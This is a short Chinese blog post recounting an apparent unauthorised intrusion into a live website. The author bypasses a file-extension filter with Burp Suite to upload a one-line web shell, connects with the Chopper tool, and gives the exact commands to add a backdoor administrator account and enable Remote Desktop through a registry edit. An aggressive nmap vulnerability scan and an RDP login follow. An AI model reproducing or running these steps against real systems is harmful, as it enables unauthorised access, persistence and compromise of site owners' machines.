记一次真实渗透经历

本文纯属分享一种实战思维,如有损害利益,请联系小编

背景小编就不多解释了,网络上很多都是关于靶机教程,小编在这里给大家带来一次实战的效果

小编在某站点扫描时,发现其可能存在上传漏洞
在这里插入图片描述
小编想上传一句话木马,但是发现该站点对文件后缀进行了过滤,故采用burpsuite抓包实现一句话木马文件上传
在这里插入图片描述
成功上传之后,利用一句话木马进行连接
在这里插入图片描述
利用菜刀工具的cmd创建用户添加管理员组,打开3389端口允许远程连接。
在这里插入图片描述
例:

net user test test /add
net localgroup administrators test /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

用nmap扫描查看是否成功开启3389

nmap -T4 -A -sV -Pn -f --min-hostgroup 1024 --min-parallelism 1024 --script=smb-vuln-*.nse IP -p 1-65535

在这里插入图片描述

利用windows自带的远程工具连接,之后…睡觉吧
在这里插入图片描述


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部